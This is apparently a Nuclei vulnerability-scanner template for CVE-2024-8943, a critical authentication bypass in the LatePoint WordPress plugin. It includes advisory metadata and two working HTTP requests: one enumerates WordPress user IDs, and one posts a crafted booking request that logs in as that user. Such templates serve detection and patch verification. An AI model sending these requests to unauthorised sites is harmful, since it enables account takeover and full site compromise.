id: CVE-2024-8943

info:
  name: LatePoint <= 5.0.12 - Authentication Bypass
  author: daffainfo
  severity: critical
  description: |
    LatePoint plugin for WordPress versions up to 5.0.12 contains an authentication bypass caused by insufficient verification of the user during booking. Unauthenticated attackers can log in as any existing user if they have access to the user ID. Exploitation requires access to the user ID and the 'Use WordPress users as customers' setting to be enabled.
  impact: |
    Attackers can log in as any existing user, including administrators, potentially leading to full site compromise.
  remediation: |
    Update to version 5.0.13 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/LatePoint/latepoint-5012-authentication-bypass
    - https://www.wordfence.com/blog/2024/10/7000-wordpress-sites-affected-by-unauthenticated-critical-vulnerabilities-in-latepoint-wordpress-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8943
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8943
    epss-score: 0.40056
    epss-percentile: 0.97438
    cwe-id: CWE-287
    cpe: cpe:2.3:a:latepoint:latepoint:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: latepoint
    product: latepoint
    framework: wordpress
  tags: cve,cve2024,wp,wordpress,wp-plugin,latepoint,auth-bypass,vkev

variables:
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

flow: http(1) && http(2)

http:
  # Request 1: read the first user's id and name from the WordPress REST API.
  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json/wp/v2/users"
        - "?rest_route=/wp/v2/users"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "[{\"id", "name\":")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: json
        name: userid
        json:
          - '.[0].id'
        internal: true

      - type: json
        name: username
        json:
          - '.[0].name'
        internal: true

  # Request 2: submit the booking "customer" step with the extracted user id;
  # a wordpress_logged_in_ cookie in the response marks the target as vulnerable.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=latepoint_route_call&route_name=steps__load_step&params=current_step_code%3dcustomer%26step_direction%3dnext%26customer%5bid%5d%3d{{userid}}%26customer%5bemail%5d%3d{{email}}%26customer%5bpassword%5d%3d{{password}}%26customer%5bpassword_confirmation%5d%3d{{password}}%26customer%5bfirst_name%5d%3d{{firstname}}%26customer%5blast_name%5d%3d{{lastname}}&layout=none&return_format=json

    matchers:
      - type: dsl
        dsl:
          - 'contains(set_cookie, "wordpress_logged_in_")'
          - 'contains(body, "\"status\":\"success\"")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100e9904473c8210156a18cfd2e95ce5bc0d0a66a53e3b2f5ddd84ad64bf5b930be022100d239a5219aa8d023d93144493d6c1bd5143178f938db85db7ed5ee11499867b2:922c64590222798bb761d5b6d8e72950